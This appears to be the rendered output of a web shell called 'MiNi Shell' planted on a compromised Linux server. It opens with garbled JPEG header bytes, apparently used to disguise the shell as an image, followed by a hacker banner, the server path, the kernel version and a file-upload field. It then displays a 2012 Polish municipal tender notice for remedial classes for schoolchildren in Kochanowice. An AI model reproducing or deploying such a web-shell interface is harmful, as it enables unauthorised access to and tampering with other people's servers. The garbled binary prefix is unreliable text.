JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120206/35416-N-2012.html

<p class="kh_header"><b>Kochanowice: Usługi edukacyjne obejmujące prowadzenie zajęć dla uczestników projektu POKL pn. Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Kochanowice realizowanego w gminie Kochanowice w roku szkolnym 2011/2012 w szkołach podstawowych, dla których organem prowadzącym jest Gmina Kochanowice</b><br>
<b>Numer ogłoszenia: 35416 - 2012; data zamieszczenia: 06.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kochanowice , ul. Wolności 5, 42-713 Kochanowice, woj. śląskie, tel. 034 3533100 w. 36, faks 034 3533105.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.kochanowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi edukacyjne obejmujące prowadzenie zajęć dla uczestników projektu POKL pn. Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Kochanowice realizowanego w gminie Kochanowice w roku szkolnym 2011/2012 w szkołach podstawowych, dla których organem prowadzącym jest Gmina Kochanowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa edukacyjna zajęć pozalekcyjnych dla uczniów Zespołu Szkół w Kochanowicach, Zespołu Szkolno-Przedszkolnego w Kochcicach oraz Publicznej Szkole Podstawowej im. K.Damrota w Lubecku w ramach realizacji projektu Indywidualizacja procesu nauczania w klasach I-III szkół podstawowych realizowanego w ramach Programu Operacyjnego Kapitał Ludzki - poddziałanie 9.1.2. - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. Celem głównym jest wyrównywanie szans edukacyjnych uczniów, poprzez indywidualizację procesu dydaktyczno - wychowawczego w klasach I-III, zmniejszenie dysproporcji w osiągnięciach edukacyjnych oraz wpływ na podniesienie jakości poziomu kształcenia co spowoduje wzrost umiejętności praktycznych uczniów, pokonanie trudności w nauce, wzrost u uczniów pewności siebie, nabywanie umiejętności planowania i zagospodarowania czasu wolnego, prawidłowe funkcjonowanie w środowisku rówieśniczym, umiejętne korzystanie z gier i programów komputerowych, poznanie z innej strony matematyki, poprawę wyników nauczania i wyników sprawdzianu kompetencji po kl. III. Prowadzone będą zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji oraz zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, zajęcia logopedyczne korygujące wady wymowy oraz zajęcia gimnastyki korekcyjnej dla dzieci z wadami postawy mającej na celu usprawnienie motoryki uczestników.
Zajęcia z uczestnikami projektu z danej szkoły prowadzone będą na terenie danej placówki po zakończeniu obowiązkowych zajęć lekcyjnych według harmonogramu opracowanego przez osoby świadczące usługi we współpracy z koordynatorem szkolnym po uzgodnieniu z dyrektorem szkoły i koordynatorem projektu.
Zajęcia mają być prowadzone w oparciu o opracowane przez nauczycieli programy uwzględniające przeprowadzoną wcześniej diagnozę potrzeb uczestników projektu. Prowadzący zajęcia pozalekcyjne będzie odpowiadał za przygotowanie, realizację dokumentację zajęć dodatkowych dla uczniów, działania dostosowywane będą do potrzeb odbiorców usług edukacyjnych.
Zadanie obejmuje prowadzenie:
a)	zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji,
b)	zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych,
c)	zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy,
d)	zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy.

Do obowiązków wykonawcy - prowadzącego zajęcia będzie należało m.in.:
1.	Prowadzenie zajęć pozalekcyjnych określonych w poszczególnych częściach zamówienia w terminie maksymalnym do 15 czerwca 2012 r., zajęcia realizowane będą po obowiązkowych lekcjach w godzinach dostosowanych do wymogów uczestników i warunków szkoły, dotyczy wszystkich zadań opisanych w punktach a, b, c, d.
2.	Opracowanie programu (z uwzględnieniem zindywidualizowanych programów wypracowanych przez poszczególne szkoły) i planu pracy zajęć pozalekcyjnych obejmującego harmonogram oraz zakres zadania dla uczestników w porozumieniu z koordynatorem szkolnym i przedstawienia do akceptacji dyrektorowi danej szkoły oraz koordynatorowi projektu na szczeblu gminy dot. zadań opisanych w projekcie: a, b, c, d.
3.	W przypadku braku możliwości realizacji zajęć w wyznaczonym terminie (zgodnie z harmonogramem) z powodów niezależnych od wykonawcy możliwe jest przeprowadzenie takich zajęć w innym terminie po uzgodnieniu z dyrektorem szkoły i koordynatorem szkolnym. 
4.	Dokumentowanie zajęć pozalekcyjnych: dzienniki zajęć, listy obecności.
5.	Opracowanie i przeprowadzenie testów kompetencji minimum dwa razy: na początku i na zakończenie realizacji zajęć, dotyczy zadania opisanego w punkcie a, b, c. 
6.	Opracowanie i wypełnianie indywidualnego arkusza obserwacji postawy dziecka minimum trzy razy: na początku, w połowie i końcu realizacji zajęć, dotyczy zadania opisanego w punkcie d.
7.	Sporządzenie sprawozdań z realizacji zajęć w połowie i na zakończenie realizacji projektu.
8.	Współpraca z dyrektorem szkoły, w której będą prowadzone zajęcia, koordynatorem szkolnym i koordynatorem projektu na szczeblu gminy.
9.	Comiesięczne przekazywanie dyrektorowi szkoły, w której realizowany jest projekt, koordynatorowi szkolnemu oraz koordynatorowi projektu na szczeblu gminy - informacji o stanie realizacji planu zajęć, w tym o ilości zrealizowanych godzin. 
10.	Wykonywanie innych niezbędnych zadań zleconych przez koordynatora projektu, wynikłych w trakcie realizacji projektu, a ściśle związanych z merytoryczną pracą prowadzącego dane zadanie projektu.
Szczegółowy zakres obowiązków prowadzącego zajęcia ujęty został w projekcie umowy, stanowiącej załącznik nr 5 do SIWZ. Zakres obowiązków odnosi się do wszystkich poniżej wymienionych 8 części przetargu.
Używaną w SIWZ jednostkę 1 godzina należy rozumieć jako 1 godzinę lekcyjną, czyli 45 minut.
Usługi będą realizowane w niżej wymienionych szkołach z podziałem na rodzaje zajęć, stanowiące części zamówienia: 
Zespół Szkół w Kochanowicach 
Część zamówienia nr 1:
1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w wymiarze - 120 godzin - 4 grupy (razem 25 osób).
2) Wspólny Słownik Zamówień (CPV): 80.10.00.00-5.
3) Czas trwania lub termin wykonania: realizacja zajęć do 15 czerwca 2012 r.
4) Kryteria oceny ofert: najniższa cena.
 
Część zamówienia nr 2:
1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - 60 godzin - 2 grupy (razem 16 osób).
2) Wspólny Słownik Zamówień (CPV): 80.10.00.00-5.
3) Czas trwania lub termin wykonania: realizacja zajęć do 15 czerwca 2012 r.
4) Kryteria oceny ofert: najniższa cena.

Część zamówienia nr 3:
1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - 60 godzin - 2 grupy (razem 41 osób). 
2) Wspólny Słownik Zamówień (CPV): 80.10.00.00-5.
3) Czas trwania lub termin wykonania: realizacja zajęć do 15 czerwca 2012 r.
4) Kryteria oceny ofert: najniższa cena.
 
Część zamówienia nr 4:
1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: Gimnastyka korekcyjna dla dzieci z wadami postawy - 30 godzin - 1 grupa (razem 29 osób).
2) Wspólny Słownik Zamówień (CPV): 80.10.00.00-5.
3) Czas trwania lub termin wykonania: realizacja zajęć do 15 czerwca 2012 r.
4) Kryteria oceny ofert: najniższa cena.

Zespół Szkolno-Przedszkolny w Kochcicach
Część zamówienia nr 5:
1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - 30 godzin - 1 grupa (razem 18 osób).
2) Wspólny Słownik Zamówień (CPV): 80.10.00.00-5.
3) Czas trwania lub termin wykonania: realizacja zajęć do 15 czerwca 2012 r.
4) Kryteria oceny ofert: najniższa cena.

Część zamówienia nr 6:
1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: Gimnastyka korekcyjna dla dzieci z wadami postawy - 30 godzin -1 grupa (29 osób).
2) Wspólny Słownik Zamówień (CPV): 80.10.00.00-5.
3) Czas trwania lub termin wykonania: realizacja zajęć do 15 czerwca 2012 r.
4) Kryteria oceny ofert: najniższa cena.

Publiczna Szkoła Podstawowa im. K.Damrota w Lubecku
Część zamówienia nr 7:
1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w wymiarze - 30 godzin - 1 grupa (razem 10 osób).
2) Wspólny Słownik Zamówień (CPV): 80.10.00.00-5.
3) Czas trwania lub termin wykonania: realizacja zajęć do 15 czerwca 2012 r.
4) Kryteria oceny ofert: najniższa cena.

Część zamówienia nr 8:
1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: Gimnastyka korekcyjna dla dzieci z wadami postawy - 30 godzin -1 grupa (13 osób).
2) Wspólny Słownik Zamówień (CPV): 80.10.00.00-5.
3) Czas trwania lub termin wykonania: realizacja zajęć do 15 czerwca 2012 r.
4) Kryteria oceny ofert: najniższa cena.

Przedmiot zamówienia określony powyżej w części od 1 do 8, ma być świadczony przez osoby wskazane przez Wykonawcę w wykazie osób, które będą realizować zamówienie, dołączonym do oferty (wzór wykazu stanowi załącznik nr 4 do SIWZ).

Ponadto zgodnie z wytycznymi Instytucji Pośredniczącej Programu Operacyjnego Kapitał Ludzki osoba/osoby zdolna/e do wykonania zamówienia nie może/nie mogą być zatrudniona/e w instytucjach uczestniczących w realizacji Programu Operacyjnego Kapitał Ludzki, tj. Instytucji Zarządzającej, Instytucji Pośredniczącej, Instytucji Wdrażającej (Instytucji Pośredniczącej II stopnia), Regionalnych ośrodków EFS, Krajowym Ośrodku EFS, Krajowej Instytucji Wspomagającej, chyba że nie zachodzi konflikt interesów ani podwójne finansowanie (w takim przypadku należy stosownymi zaświadczeniami, oświadczeniami wykazać brak konfliktu interesów i podwójnego finansowania).
Osoba/osoby zdolna/e do wykonania zamówienia nie może/nie mogą być na dzień podpisania umowy zaangażowana/e w realizację zadań w projektach finansowanych w ramach POKL w takim stopniu, że nie będzie mogła/y wykonać zamówienia, chyba, że wykaże/ą, że będzie/będą w stanie efektywnie realizować zadania w projekcie (składając stosowne oświadczenia, zaświadczenia, harmonogramy realizacji zadań w innych projektach itp.).

W związku z powyższym Zamawiający będzie żądał przed podpisaniem umowy z Wykonawcą:
a)oświadczenia wykonawcy o niezatrudnieniu w instytucjach uczestniczących w realizacji POKL 2007-2013, według wzoru stanowiącego załącznik nr 6 do SIWZ,
b)oświadczenia o zaangażowaniu Wykonawcy w realizację zadań w innych projektach finansowanych w ramach POKL 2007-2013, według wzoru stanowiącego załącznik nr 7 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania do wykonania zamówienia
Zamawiający uzna warunki za spełnione na podstawie stosownego oświadczenia złożonego przez Wykonawcę - załącznik nr 3</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania do wykonania zamówienia
Zamawiający uzna warunki za spełnione na podstawie stosownego oświadczenia złożonego przez Wykonawcę - załącznik nr 3</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunków określonych w przepisach art. 22 ust. 1 ustawy Prawo zamówień publicznych, dotyczących dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia Zamawiający określa, że: osoby wykonujące zajęcia edukacyjne określone w poszczególnych częściach zamówienia (część  od 1 do 8):
a)	muszą posiadać, co najmniej stopień awansu zawodowego nauczyciela kontraktowego,
b)	wykonawcy wszystkich zadań określonych w częściach zamówienia od 1 do 8 muszą spełniać wymogi dotyczące wykształcenia i kwalifikacji nauczycieli określone w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 roku (Dz.U. z 2009 r. Nr 50 poz. 400) w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. z 2009 r. Nr 50, poz. 400),
c)	muszą posiadać wykształcenie wyższe z przygotowaniem pedagogicznym dające kwalifikacje do nauczania w klasach I-III szkoły podstawowej - dla części zamówienia nr 1, 2, 5, 7,
d)	muszą posiadać wykształcenie zgodnie z wymogami zawartymi w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 roku (Dz.U. z 2009 r. Nr 50 poz. 400) oraz uprawnienia do prowadzenia zajęć logopedycznych - dla części zamówienia nr 3,
e)	muszą posiadać wykształcenie zgodnie z wymogami zawartymi w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 roku (Dz.U. z 2009 r. Nr 50 poz. 400) oraz kwalifikacje do prowadzenia gimnastyki korekcyjnej - dla części zamówienia nr 4, 6, 8.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunków określonych w przepisach art. 22 ust. 1 ustawy Prawo zamówień publicznych, dotyczących sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - Zamawiający przyjmuje, że warunek uznany będzie za spełniony na podstawie stosownego oświadczenia złożonego przez wykonawcę - załącznik nr 3.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia (załącznik nr 4 do SIWZ), należy dołączyć:
- dokument potwierdzający nadanie stopnia awansu zawodowego,
- dokument potwierdzający wykształcenie zgodne z wymogami zawartymi w rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 r. Dz. U. z 2009 r. Nr 50 poz. 400 w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli,
- dokument potwierdzający wykształcenie wyższe z przygotowaniem pedagogicznym dający kwalifikacje do nauczania w klasach I-III szkoły podstawowej - dla części zamówienia nr 1, 2, 5, 7, 
- dokument potwierdzający wykształcenie zgodnie z wymogami zawartymi w Rozporządzeniu Ministra Edukacji  Narodowej z dnia 12 marca 2009 roku (Dz.U. z 2009 r. Nr 50 poz. 400) oraz dokument potwierdzający posiadanie uprawnień do prowadzenia zajęć logopedycznych - dla części zamówienia nr 3,
- dokument potwierdzający wykształcenie zgodnie z wymogami zawartymi w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 roku (Dz.U. z 2009 r. Nr 50 poz. 400) oraz dokument potwierdzający posiadanie uprawnień do prowadzenia gimnastyki korekcyjnej - dla części zamówienia nr 4, 6, 8,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kochanowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kochanowice
ul. Wolności 5
42-713 Kochanowice
Pokój nr 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2012 godzina 10:00, miejsce: Urząd Gminy Kochanowice
ul. Wolności 5
42-713 Kochanowice
Pokój nr 11 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego realizowanego w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com